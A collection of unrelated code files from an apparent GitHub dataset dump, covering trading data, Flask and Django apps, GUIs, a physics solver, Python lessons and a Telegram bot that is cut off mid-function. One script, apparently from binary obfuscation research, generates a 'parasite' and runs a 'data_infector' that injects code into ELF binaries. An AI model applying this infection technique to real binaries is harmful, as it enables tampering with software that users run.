int(time.time())\n\n def _update(self):\n orderbook = self.get_orderbook('all', 99)\n self.last_update = int(time.time())\n\n for key in orderbook:\n if key not in self.tickers:\n self.tickers[key] = Ticker(key)\n self.tickers[key].update(orderbook[key])\n\n ticker_keys = self.tickers.keys()\n for key in ticker_keys:\n if key not in orderbook:\n del self.tickers[key]\n\n def get_data(self):\n ts = int(time.time())\n self._update()\n data = []\n for key in self.tickers:\n lowest_ask, highest_bid = self.tickers[key].get_prices()\n asks, bids = self.tickers[key].get_volumes()\n if lowest_ask and highest_bid:\n record = [ts, key, lowest_ask, highest_bid, asks, bids]\n data.append(record)\n return data\n","repo_name":"zosimovaa/pdc","sub_path":"_depr/data_collector/poloniex_ob_volumes.py","file_name":"poloniex_ob_volumes.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38023645607","text":"# flake8: noqa:E501\n# pylint: disable=line-too-long\n# pylint: disable=import-outside-toplevel\nfrom celery import chain\n\nfrom core.models import WebinarApplication\nfrom core.tasks import (\n task_create_application_invoice,\n task_save_application_invoice_metadata,\n task_send_invoice_email,\n)\n\n\ndef dispatch_invoice_for_application(\n application: WebinarApplication, send_via_email: bool = True\n):\n \"\"\"Dispatch invoice for given application\"\"\"\n\n from core.services import ApplicationService\n\n application_service = ApplicationService(application)\n\n # Prevent blank invoice from being created\n if application_service.get_valid_participants().count() == 0:\n return\n\n invoice_jobs = [\n task_create_application_invoice.si(application.id), # type: ignore\n task_save_application_invoice_metadata.s(application.id), # type: ignore\n ]\n\n if send_via_email:\n invoice_jobs.append(\n task_send_invoice_email.si(application.invoice.invoice_email, application.id), # type: ignore\n )\n\n # Dispatch invoice tasks\n chain(*invoice_jobs).apply_async()\n","repo_name":"rolzwy7/wykladowcav2","sub_path":"src/core/tasks_dispatch/dispatch_invoice_for_application.py","file_name":"dispatch_invoice_for_application.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41632821386","text":"from flask import Flask, url_for, render_template, g, abort\nfrom DBManipulator import DBM\nimport sqlite3\nimport os\n\n\nDEBUG = True\nDATABASE = '/tmp/site_db.db'\n\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config.update(DATABASE=os.path.join(app.root_path, 'site_db.db'))\n\n\ndef connect_db():\n con = sqlite3.connect(app.config['DATABASE'])\n con.row_factory = sqlite3.Row\n return con\n\n\ndef create_db():\n db = connect_db()\n with app.open_resource('sq_db.sql', 'r') as file:\n db.cursor().executescript(file.read())\n db.commit()\n db.close()\n\n\ndef get_db():\n if not hasattr(g, 'link_db'):\n g.link_db = connect_db()\n return g.link_db\n\n\ndef dbm_thrower():\n db = get_db()\n dbase = DBM(db)\n return dbase\n\n\n@app.route('/')\n@app.route('/main')\ndef main_page():\n return render_template(\"mainpage.html\", title='Main', lorems=dbm_thrower().get_all_lorems(),\n site_menu=dbm_thrower().get_menu())\n\n\n@app.route('/lorem/<int:id_lorem>')\ndef show_lorem(id_lorem):\n title, lorem = dbm_thrower().get_one_lorem(id_lorem)\n if not title:\n abort(404)\n return render_template(\"chosenlorem.html\", title=title, lorem=lorem, site_menu=dbm_thrower().get_menu())\n\n\n@app.route('/about')\ndef about_page():\n return render_template(\"aboutHW.html\", title='About', site_menu=dbm_thrower().get_menu())\n\n\n@app.route('/loremipsum')\ndef lorem_ipsum():\n return render_template(\"loremipsum.html\", title='Fish text', site_menu=dbm_thrower().get_menu())\n\n\n@app.route('/github')\ndef github_page():\n return render_template(\"github.html\", title=\"Git\")\n\n\n@app.teardown_appcontext\ndef close_db(error):\n if hasattr(g, 'link.db'):\n g.link_db.close()\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return render_template('page404.html', title=\"Not Found\", site_menu=dbm_thrower().get_menu())\n\n\nif __name__ == '__main__':\n app.run(debug=DEBUG)\n","repo_name":"animeh4ter/FlaskProjects","sub_path":"hw1main.py","file_name":"hw1main.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25357960920","text":"# toSketch.py\r\n# \r\n# Copyright 2010 Alex Dumitrache <alex@cimr.pub.ro>\r\n# \r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\r\n# MA 02110-1301, USA.\r\n\r\n# Exports current cgkit scene as a Sketch drawing (useful for including in documents)\r\n\r\nsketchTemplate = \"\"\"\r\ndef rgb<>\r\ndef limb<>\r\ninput{lib/defaults.sk}\r\n{\r\n input{lib/objects.sk}\r\n def style [cull=false, draw=black, fill=black!5]\r\n {coordsys}\r\n\r\n %s\r\n \r\n}\r\n\r\nglobal {\r\n language tikz\r\n camera %s * scale(20) then translate([0,0,-100]) then perspective(30)\r\n}\r\n\"\"\"\r\n\r\ndef trans2sk(T):\r\n sk = \"[[%g,%g,%g,%g] [%g,%g,%g,%g] [%g,%g,%g,%g] [%g,%g,%g,%g]]\" % tuple(T.toList(True))\r\n return sk\r\n\r\nbase.meshname = \"base\"\r\nlink1.meshname = \"link1\"\r\nlink2.meshname = \"link2\"\r\nlink3.meshname = \"link3\"\r\nlink4.meshname = \"link4\"\r\nlink5.meshname = \"link5\"\r\nlink6.meshname = \"link6\"\r\ngripper.meshname = \"grip\"\r\n\r\ndef toSketch(filename):\r\n scene = getScene()\r\n cam = worldObject('TargetCamera')\r\n lookat = cam.worldtransform * (0,0,1)\r\n skcam = \"view((%g,%g,%g),(%g,%g,%g),[%g,%g,%g])\" % (cam.pos.x, cam.pos.y, cam.pos.z, lookat.x, lookat.y, lookat.z, scene.up.x, scene.up.y, scene.up.z)\r\n sk = \"\"\r\n for b in getScene().walkWorld():\r\n if not b.visible: continue\r\n sk += \"\\n # %s\\n\" % b.name\r\n if type(b.geom) == cgkit.boxgeom.BoxGeom:\r\n sk += \" put {%s * scale([%g,%g,%g])}{box}\\n\" % (trans2sk(b.worldtransform), b.lx,b.ly,b.lz)\r\n elif hasattr(b, 'meshname'):\r\n sk += \" put {%s * scale(0.001) * rotate(180,[Z])}{input{meshes/%s.sk}{%s}}\\n\" % (trans2sk(b.worldtransform), b.meshname, b.meshname)\r\n ske = sketchTemplate % (sk,skcam)\r\n\r\n skf = open(os.path.join(sys.basepath, \"sketch\", filename + \".sk\"), \"w\")\r\n skf.write(ske)\r\n skf.close()\r\n","repo_name":"alexdu/robot-sandbox","sub_path":"sim-files/toSketch.py","file_name":"toSketch.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"} +{"seq_id":"73960326800","text":"from django.conf.urls import url\nfrom site_stats import views\n\napp_name = 'site_stats'\nurlpatterns = [\n url(r'text-stats/$', views.StatsTextStatsView.as_view(), name='text_stats'),\n url(r'prediction-chart/$', views.CommonPredictionChart.as_view(), name='prediction_chart'),\n url(r'points-chart/$', views.CommonPointsChart.as_view(), name='prediction_points'),\n url(r'users-selector/$', views.AllUsersListView.as_view(), name='user_selector'),\n url('user-graphs/(?P<pk>\\d+)', views.UserGraphsView.as_view(), name='graphs_per_user'),\n]\n","repo_name":"maddrum/world_cup_results","sub_path":"site_stats/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40989623223","text":"import time\nimport sys\nimport socket\nimport threading\n\nhost, port = \"127.0.0.1\", 25001\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((host, port))\nsock.send(b'1')\nprint(sock.recv(1024).decode())\n\ndef recvThreadFunc():\n while True:\n try:\n otherword = sock.recv(1024)\n if otherword:\n print(otherword.decode())\n else:\n pass\n except ConnectionAbortedError:\n print('Server closed this connection!')\n break\n \n except ConnectionResetError:\n print('Server is closed!')\n break\n\n\nt = threading.Thread(target=recvThreadFunc)\nt.setDaemon(True)\nt.start()\nt.join()","repo_name":"Mark840308/py_OpenVR","sub_path":"triad_openvr-master/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"30346468670","text":"# This Python file uses the following encoding: utf-8\r\nimport os, threading, requests\r\nfrom pathlib import Path\r\nimport sys\r\nimport datetime\r\nimport json\r\nimport time\r\nimport threading\r\n\r\nfrom PySide2.QtGui import QGuiApplication, QIcon\r\nfrom PySide2.QtWidgets import QApplication\r\nfrom PySide2.QtQml import QQmlApplicationEngine\r\nfrom PySide2.QtCore import QObject, Slot, Signal, QTimer, QUrl\r\nfrom PySide2.QtWebEngine import QtWebEngine\r\nfrom PySide2 import QtSvg\r\n\r\ndef colConv(num):\r\n if num == 0: return 'green'\r\n if num == 3: return 'red'\r\n return\r\n\r\nclass MainWindow(QObject,threading.Thread):\r\n def __init__(self):\r\n QObject.__init__(self)\r\n threading.Thread.__init__(self)\r\n\r\n # QTimer - Run Timer\r\n self.timer = QTimer()\r\n self.timer.timeout.connect(lambda: self.setTime())\r\n self.timer.start(1000)\r\n \r\n self.srvCat = 'http://127.0.0.1:8080/'\r\n self.dataStructure = {}\r\n self.context = {'gym':None,'room':None,'menu':None}\r\n self.updateFlag = {'gyms':False,'rooms':False,'devices':False}\r\n self.status = {}\r\n \r\n # Ale signals\r\n \r\n updElem = Signal('QVariant')\r\n gymSig = Signal(list)\r\n roomSig = Signal(list)\r\n devSig = Signal(list)\r\n adjSig = Signal(list)\r\n connStatus = Signal('Qvariant')\r\n \r\n signalAle = Signal(int)\r\n removeConfSig = Signal(int)\r\n\r\n # Signal Set Data\r\n printTime = Signal(str)\r\n \r\n def start_engine(self):\r\n QtWebEngine.initialize()\r\n self.engine = QQmlApplicationEngine()\r\n self.start()\r\n\r\n\r\n # Set Timer Function\r\n\r\n def setTime(self):\r\n now = datetime.datetime.now()\r\n formatDate = now.strftime(\"Now is %H:%M:%S of %Y/%m/%d\")\r\n #print(formatDate)\r\n self.printTime.emit(formatDate)\r\n \r\n @Slot(str,str)\r\n def retrieveData(self,gymName,roomName):\r\n print(\"\\n\\n\\nRetrive data!!!!\\n\\n\\n\")\r\n if gymName == 'None' and roomName == 'None':\r\n gymList = [{\"name\": \"San Donato\", \"status\": \"green\"}]\r\n self.gymSig.emit(gymList)\r\n if roomName == 'None':\r\n if gymName == \"San Donato\":\r\n roomList = [{\"name\": \"Cazzo\", \"status\": \"green\"}]\r\n else:\r\n roomList = [{\"name\": \"Prova\", \"status\": \"red\"}]\r\n self.roomSig.emit(roomList)\r\n else:\r\n deviceList = self.l3\r\n print(deviceList)\r\n self.deviceSig.emit(deviceList)\r\n \r\n @Slot(str)\r\n def receiveConfElem(self,actionDict):\r\n \r\n confElementDict = json.loads(actionDict)\r\n print(type(confElementDict))\r\n print(confElementDict)\r\n self.signalAle.emit(0)\r\n \r\n @Slot(str)\r\n def removeConf(self,confName):\r\n ######SE LA RIMOZIONE AVVIENE CON SUCCESSO FAI EMIT 0 ALTRIMENTI EMIT 1\r\n print(confName)\r\n self.removeConfSig.emit(0) #Se tutto ok\r\n \r\n #self.removeConfSig.emit(1) #Se qualcosa è andato storto\r\n\r\n @Slot()\r\n def sendConf(self):\r\n print(\"Invia conf dict allo SRM\")\r\n \r\n\r\n @Slot(str,str,str,str)\r\n def pairList(self,gym,room,m1,m2):\r\n print(f\"Pair List: {gym} {room} {m1} {m2}\")\r\n \r\n @Slot(str,str,str)\r\n def getAdjacency(self,selectedGym,selectedRoom,selectedDevice):\r\n print(f\"getAdjacency:{selectedGym} {selectedRoom} {selectedDevice}\")\r\n\r\n \r\n ###############################################\r\n ### QUESTO SLOT RICEVERA' IL JSON IN FORMATO \r\n ### STRINGA.\r\n ###############################################\r\n @Slot(str)\r\n def conf_SRM(self,actionDict):\r\n print(json.loads(actionDict))\r\n\r\n resetAllSig = Signal(int)\r\n @Slot()\r\n def sendConf(self):\r\n self.resetAllSig.emit(0)\r\n \r\n \r\n \r\n \r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n app.setOrganizationName('pythonProj')\r\n app.setOrganizationDomain('OD')\r\n # app.setWindowIcon(QIcon(\"images\\od_conf.svg\")) # convertire svg in pixmap\r\n # Get Context\r\n main = MainWindow()\r\n main.start_engine()\r\n\r\n # Set Context\r\n\r\n main.engine.rootContext().setContextProperty(\"backend\", main)\r\n \r\n # Load QML file\r\n main.engine.load(os.fspath(Path(__file__).resolve().parent / \"qml/main.qml\"))\r\n \r\n \r\n if not main.engine.rootObjects():\r\n sys.exit(-1)\r\n \r\n \r\n sys.exit(app.exec_())\r\n \r\n","repo_name":"Andrewxx93/Qt_Application_with_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"42273955565","text":"T = int(input())\n\ndef path(cur,cnt,value):\n global min_result\n px,py = arr[cur][0],arr[cur][1]\n\n\n if value > min_result:\n return\n if cnt == N:\n dis = abs(arr[1][0]-px) + abs(arr[1][1]-py)\n if value + dis < min_result:\n min_result = value +dis\n return\n\n for i in range(2,N+2):\n x,y = arr[i][0],arr[i][1]\n dis = abs(px-x)+abs(py-y)\n if not visited[i]:\n visited[i] = True\n path(i,cnt+1,value+dis)\n visited[i] = False\n\n \n\n\n\n\nfor tc in range(1,T+1):\n N = int(input())\n arr = []\n\n temp = list(map(int,input().split()))\n for i in range((N+2)):\n arr.append(temp[2*i:2*(i+1)])\n min_result = 999999999999999\n visited = [False]*(N+2)\n visited[0] = True\n path(0,0,0)\n print('#{} {}'.format(tc,min_result))","repo_name":"gkgg123/TIL","sub_path":"휴강기간_공부/알고리즘_0309/swea_1247_최적경로.py","file_name":"swea_1247_최적경로.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25182728533","text":"# Importing necessary libraries \nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import linalg\n\n\n# Setting up initial variables\nL = 1\nx = np.linspace(0, L, 1001)\na = L/1000\nh = 10**-4\ntime = np.arange(0, 0.1, h)\n\n\n# Setting up initial conditions\nx_0 = L/2.\nsigma = L/10.\nkappa = 50./L\npsi = np.exp(-1* ((x - x_0)**2)/(2*sigma**2)) * np.exp(1j * kappa * x)\npsi[0] = psi[-1] = 0\n\n\n# Setting up a1, a2, b1, b2\na1 = 1 + 1j*(h/(2*a**2))\na2 = -1j*(h/(4*a**2))\nb1 = 1 - 1j*(h/(2*a**2))\nb2 = 1j*(h/(4*a**2))\n\n\n# Creating matrix A\nN = 1001\nA_diag = np.ones(N, dtype=complex)*a1\nA_u = np.ones(N, dtype=complex) * a2\nA_u[0] = 0\nA_l = np.ones(N, dtype=complex) * a2\nA_l[-1] = 0\n# build matrix\nA = np.array([A_u, A_diag, A_l])\n\n\n# Getting psi values \npsi_values = []\n\nfor t in time:\n\n psi_values.append(psi)\n psiold = psi\n \n # calculate v\n psiold = np.concatenate(([0],psi,[0])) \n v = b1*psiold[1:-1] + b2*(psiold[2:]+psiold[:-2])\n \n # Solve matrix\n psi = linalg.solve_banded((1,1), A, v)\n psi[0] = psi[-1] = 0\n\n\n# Convert psi values list to array\npsi_values = np.array(psi_values, dtype=complex)\nreal_parts = np.real(psi_values)\n\n\n# Plot for time t=0\nplt.plot(x, real_parts[0], label='Psi(t=0.0000)')\nplt.xlabel('Position ($1x10^{-8}$m)', fontsize = 16)\nplt.ylabel('Amplitude', fontsize = 16)\nplt.ylim(-1.1,1.1)\nplt.legend()\nplt.savefig('t0000.png')\nplt.cla()\n\n\n# Plot for t=0.0012\nplt.plot(x, real_parts[120], label='Psi(t=0.0012)', color = 'orange')\nplt.xlabel('Position ($1x10^{-8}$m)', fontsize = 16)\nplt.ylabel('Amplitude', fontsize = 16)\nplt.ylim(-1.1,1.1)\nplt.legend()\nplt.savefig('t0012.png')\nplt.cla()\n\n\n# Plot for t=0.0020\nplt.plot(x, real_parts[200], label='Psi(t=0.0020)', color = 'green')\nplt.xlabel('Position ($1x10^{-8}$m)', fontsize = 16)\nplt.ylabel('Amplitude', fontsize = 16)\nplt.ylim(-1.1,1.1)\nplt.legend()\nplt.savefig('t0020.png')\nplt.cla()\n\n\n# Plot for t=0.0099\nplt.plot(x, real_parts[999], label='Psi(t=0.0099)', color = 'red')\nplt.xlabel('Position ($1x10^{-8}$m)', fontsize = 16)\nplt.ylabel('Amplitude', fontsize = 16)\nplt.ylim(-1.1,1.1)\nplt.legend()\nplt.savefig('t0099.png')\nplt.cla()","repo_name":"bjohnston0309/phys-ga2000","sub_path":"ps-9/Problem_1.py","file_name":"Problem_1.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"47578463409","text":"from ...abstasks.AbsTaskSTS import AbsTaskSTS\n\n\nclass BiossesSTS(AbsTaskSTS):\n @property\n def description(self):\n return {\n \"name\": \"BIOSSES\",\n \"hf_hub_name\": \"mteb/biosses-sts\",\n \"description\": \"Biomedical Semantic Similarity Estimation.\",\n \"reference\": \"https://tabilab.cmpe.boun.edu.tr/BIOSSES/DataSet.html\",\n \"type\": \"STS\",\n \"category\": \"s2s\",\n \"eval_splits\": [\"test\"],\n \"eval_langs\": [\"en\"],\n \"main_score\": \"cosine_spearman\",\n \"min_score\": 0,\n \"max_score\": 4,\n \"revision\": \"d3fb88f8f02e40887cd149695127462bbcf29b4a\",\n }\n","repo_name":"xlang-ai/instructor-embedding","sub_path":"evaluation/MTEB/mteb/tasks/STS/BiossesSTS.py","file_name":"BiossesSTS.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1419,"dataset":"github-code","pt":"22"} +{"seq_id":"29510715346","text":"# 10-DARS. IF-ELSE\n\n\"\"\"Yangi cars = ['toyota', 'mazda', 'hyundai', 'gm', 'kia'] degan ro'yxat tuzing, ro'yxat\nelementlarining birinchi harfini katta qilib konsolga chqaring. GM uchun ikkala harfni\nkatta qiling.\"\"\"\n\ncars = ['toyota', 'mazda', 'hyundai', 'gm', 'kia']\n\nfor car in cars:\n if car == 'gm':\n print(car.upper())\n else:\n print(car.title())\n# Output: Toyota\n# Output: Mazda\n# Output: Hyundai\n# Output: GM\n# Output: Kia\n\n\"\"\"Yuqoridagi mashqni teng emas (!=) operatori yordamida bajaring.\"\"\"\nfor car in cars:\n if car != 'gm':\n print(car.title())\n else:\n print(car.upper())\n# Output: Toyota\n# Output: Mazda\n# Output: Hyundai\n# Output: GM\n# Output: Kia\n\n\"\"\"Foydalanuvchi login ismini so'rang. Agar login admin bo'lsa, \"Xush kelibsiz, Admin.\nFoydalanuvchilar ro'yxatini ko'rasizmi?\" xabarini konsolga chiqaring. Aks holda,\n\"Xush kelibsiz, {foydalanuvchi_ismi}!\" matnini konsolga chiqaring.\"\"\"\nism = input('Loginingizni kiriting: ')\nif ism.lower() == 'admin':\n print(f\"Xush kelibsiz, {ism.title()}. Foydalanuvchilar ro\\'yxatini ko\\'rasizmi?\")\nelse:\n print(f\"Xush kelibsiz, {ism.title()}!\")\n# Output: Xush kelibsiz, Admin. Foydalanuvchilar ro'yxatini ko'rasizmi?\n# Output: Xush kelibsiz, Farrux! \n\n\"\"\"Foydalanuvchidan 2 ta son kiritishni so'rang. Agar ikki son bir-biriga teng bo'lsa,\n\"Sonlar teng\" ekan degan yozuvni konsolga chiqaring.\"\"\"\n\nbir_son = int(input('Birinchi sonni kiriting: '))\nikki_son = int(input('Ikkinchi sonni kiriting: '))\n\nif bir_son == ikki_son:\n print('Sonlar teng')\n# Output: Sonlar teng\n\n\"\"\"Foydalanuvchidan istalgan son kiritishni so'rang. Agar son manfiy bo'lsa konsolga\n\"Manfiy son\", agar musbat bo'lsa \"Musbat son\" degan xabarni chiqaring.\"\"\"\n\nistalgan_son = int(input('Sonni kiriting: '))\nif istalgan_son < 0:\n print('Manfiy son')\nelse:\n print('Musbat son')\n# Output: Manfiy son\n\n\"\"\"Foydalanuvchidan son kiritishni so'rang, agar son musbat bo'lsa uning ildizini\nhisoblab konsolga chiqaring. Agar son manfiy bo'lsa, \"Musbat son kiriting\" degan xabarni\nchiqaring.\"\"\"\nmusbat_son = int(input('Musbat sonni kiriting: '))\nif musbat_son > 0:\n print(f\"{musbat_son} sonining ildizi\", musbat_son**(1/2))\nelse:\n print('Musbat son kiriting')\n# Output: 25 sonining ildizi 5.0","repo_name":"KhasanovFarrukh/My_python_lessons","sub_path":"10-topshiriq.py","file_name":"10-topshiriq.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32570364385","text":"import os\nfrom dotenv import load_dotenv\nimport requests\nimport json\nfrom azure.cognitiveservices.speech import AudioDataStream, SpeechConfig, SpeechSynthesizer, SpeechSynthesisOutputFormat\nfrom azure.cognitiveservices.speech.audio import AudioOutputConfig\nimport asyncio\nimport time\n\nload_dotenv()\nSPEECH_KEY = os.getenv('AZURE_SPEECH')\nspeech_config = SpeechConfig(subscription=SPEECH_KEY, region=\"francecentral\")\n\nspeech_config.speech_synthesis_language = \"fr-FR\" \nspeech_config.speech_synthesis_voice_name =\"fr-FR-HenriNeural\"\n\nf = open('questions.json', \"r\", encoding='utf8')\nquest = json.load(f)\n\nn = 100\nx = 0\nk = 0\n\nfor q in quest[\"questions\"]:\n x = x+1\n if x > n :\n k = k+1\n if k > 3:\n time.sleep(60)\n k = 0\n audio_config = AudioOutputConfig(filename=\"speech/\"+ str(q[\"id\"])+\".mp3\")\n synthesizer = SpeechSynthesizer(speech_config=speech_config, audio_config=audio_config)\n result = synthesizer.speak_text_async(q[\"question\"]).get()\n stream = AudioDataStream(result)\n i = 0\n for a in q[\"answers\"]:\n i = i+1\n audio_config = AudioOutputConfig(filename=\"speech/\"+ str(q[\"id\"])+\"-\"+str(i)+\".mp3\")\n synthesizer = SpeechSynthesizer(speech_config=speech_config, audio_config=audio_config)\n result = synthesizer.speak_text_async(a[\"text\"]).get()\n stream = AudioDataStream(result)\n print(\"Question \"+str(q[\"id\"])+\" done\")","repo_name":"Toohk/red-cheester","sub_path":"speech.py","file_name":"speech.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"73777298936","text":"import re\nimport os\nimport sys\nimport getopt\nfrom pwn import *\nfrom getAsm import getAsm\nfrom editTextSection import EditTextSection\nfrom changeAsmToList import ChangeAsmToList\nfrom editDataSection import editDataSection\n\ncontext.arch = 'amd64'\n\nif __name__ == '__main__':\n input_filename = ''\n output_filename = ''\n try:\n opts, args = getopt.getopt(\n sys.argv[1:], \"hi:\", [\"input=\"])\n except getopt.GetoptError:\n print(\"[*] Usage: python %s -i <input-file>\" %\n sys.argv[0])\n sys.exit(-1)\n\n for opt, arg in opts:\n if opt == '-h':\n print(\"[*] Usage: python %s -i <input-file> -o <output-file>\" %\n sys.argv[0])\n sys.exit()\n elif opt in (\"-i\", \"--input\"):\n input_filename = arg\n\n output_filename = input_filename+\"_obfed\"\n\n if input_filename == \"\" or output_filename == \"\":\n print(\"[!] Missing parameters!\")\n exit(-1)\n\n # function_table = getFunction(input_filename, output_filename)\n # print(function_table)\n # exit(0)\n # asm_table = getAsm(input_filename, output_filename)\n call_list, func_list = getAsm(input_filename, output_filename)\n e = ELF(input_filename)\n data_section = e.get_section_by_name('.data').header\n bss_addr = data_section.sh_addr + data_section.sh_size\n bss_section = e.get_section_by_name('.bss').header\n bss_size = bss_section.sh_size\n print(\"[+] .bss addr: \"+hex(bss_addr))\n print(\"[+] .bss size: \"+hex(bss_size))\n\n exit(0)\n\n asm_to_add, func_list = editDataSection(\n bss_addr+bss_size, func_list)\n asm_list = ChangeAsmToList(asm_to_add, bss_size)\n # print(asm_list)\n\n # print(len(asm_list), \"\\nchar parasite[] = {\" + str(asm_list)[1:-1] + \"};\")\n\n with open(\"data-infector/parasite.h\", 'w') as out_f:\n out_f.write(\"char parasite[] = {\" + str(asm_list)[1:-1] + \"};\")\n# gcc -o ../temp/data_infector infect.c\n EditTextSection(e, call_list, func_list, output_filename)\n\n print(\"[+] gcc -o temp/data_infector data-infector/infect.c\")\n\n if os.system(\"gcc -o temp/data_infector data-infector/infect.c\") != 0:\n print(\"[-] Err\")\n exit(0)\n print(output_filename)\n # exit(0)\n\n print(\"temp/data_infector {} {}\".format(\"temp/\" + output_filename, \"temp/\"+input_filename+\"_latest\"))\n if os.system(\"temp/data_infector {} {}\".format(\"temp/\"+output_filename, \"temp/\"+input_filename+\"_latest\")) != 0:\n print(\"[-] Err\")\n exit(0)\n","repo_name":"nuaa-s3lab/BinSEAL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"26955500483","text":"from consts import *\nfrom engine.botError import *\nfrom engine.valid import *\nimport telebot\nfrom telebot import types\nimport os.path\nfrom telebot.types import InlineKeyboardButton, InlineKeyboardMarkup\n\n@bot.message_handler(commands=['restart'])\ndef send_restart(message):\n buttons_list=['/start']\n restart_keyboard=Keyboard(buttons_list)\n for user in ADMINS_ID_LIST:\n bot.send_message(chat_id=user,text='Для возобновления работы с ботом нажмите ��а кнопку стандартного меню', reply_markup=restart_keyboard.get_keyboard())\n@bot.message_handler(commands=['start'])\ndef send_start(message,initial = True ):\n \"\"\" Начало взаимодействия с ботом\n - данные пользователя сверяются с данными игроков команды\n - заправшиваются дополнительные данные, сохраняются в бд\n \"\"\"\n\n\n if message.chat.id not in PLAYERS_ID_LIST: \n if message.chat.id not in ADMINS_ID_LIST :\n if initial == True:\n bot.reply_to(message, f'Привет, для доступа обратись к админам команды')\n\n if message.chat.id in ADMINS_ID_LIST:\n user=User(message)\n if initial ==True:\n bot.send_message(chat_id=message.chat.id,text=f'Привет, {user.name}!')\n MAIN_ADMIN(message)\n\n else:\n user = User(message)\n if initial == True:\n\n bot.send_message(chat_id=message.chat.id,text=f'Привет, {user.name}!')\n\n buttons_list = ['Моя статистика','Команда']\n menu_keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id,text='Главное меню',reply_markup=menu_keyboard.get_keyboard())\n bot.register_next_step_handler(message,main_menu)\n\"\"\"\n----------------------------------------------ГЛАВНОЕ МЕНЮ АДМИНИСТРАТОРА----------------------------------\n\"\"\"\ndef MAIN_ADMIN(message):\n buttons_list = ['Моя статистика','Команда','Управление командой']\n menu_keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id, text='Главное меню', reply_markup=menu_keyboard.get_keyboard())\n bot.register_next_step_handler(message,main_admin_menu)\n\ndef main_admin_menu(message):\n\n command=message.text\n if command ==\"Моя статистика\":\n STAT(message)\n if command ==\"Команда\":\n TEAM(message)\n if command==\"Управление командой\":\n TEAM_MANAGEMENT(message)\n\"\"\"\n--------------------------------------------ГЛАВНОЕ МЕНЮ ПОЛЬЗОВАТЕЛЯ--------------------------------------------------\n\"\"\"\ndef MAIN(message):\n buttons_list = ['Моя статистика','Команда']\n menu_keyboard = Keyboard(buttons_list)\n\n bot.send_message(chat_id=message.chat.id, text='Главное меню', reply_markup=menu_keyboard.get_keyboard())\n bot.register_next_step_handler(message,main_menu)\n\ndef main_menu(message):\n if message.text ==\"Моя статистика\":\n STAT(message)\n if message.text ==\"Команда\":\n TEAM(message)\n\"\"\"\n-----------------------------------------------СТАТИСТИКА---------------------------------------\n\"\"\"\ndef STAT(message):\n buttons_list = ['Моя статистика по сезонам', 'Моя статистика за всё время','Назад']\n my_stat_keyboard = Keyboard(buttons_list)\n bot.send_message(chat_id=message.chat.id, text='Выберите период', reply_markup=my_stat_keyboard.get_keyboard())\n bot.register_next_step_handler(message,stat_menu)\n\ndef stat_menu(message):\n if message.text =='Моя статистика за всё время':\n my_stat_all_time(message)\n if message.text=='Моя статистика по сезонам':\n my_stat_by_season_pt1(message)\n if message.text=='Назад':\n if message.chat.id in ADMINS_ID_LIST:\n MAIN_ADMIN(message)\n else:\n MAIN(message)\n\ndef my_stat_by_season_pt1(message):\n button_list=['Моя статистика за текущий сезон','Моя статистика за сезон 2022', 'Назад']\n my_stat_by_season_keyboard=Keyboard(button_list)\n bot.send_message(chat_id=message.chat.id, text=\"Выберите сезон\", reply_markup=my_stat_by_season_keyboard.get_keyboard())\n bot.register_next_step_handler(message, my_stat_by_season_pt2)\n\ndef my_stat_by_season_pt2(message):\n if message.text=='Моя статистика за текущий сезон':\n my_stat_current_season(message)\n if message.text=='Моя статистика за сезон 2022':\n my_stat_season_2022(message)\n if message.text=='Назад':\n STAT(message)\n\ndef my_stat_current_season(message):\n tg_id=message.chat.id\n player_info=[]\n player_info.append(tg_id)\n\n button_list=['Назад']\n current_season_keyboard=Keyboard(button_list)\n text=db_player_season_2023_stat(db_session,player_info)\n 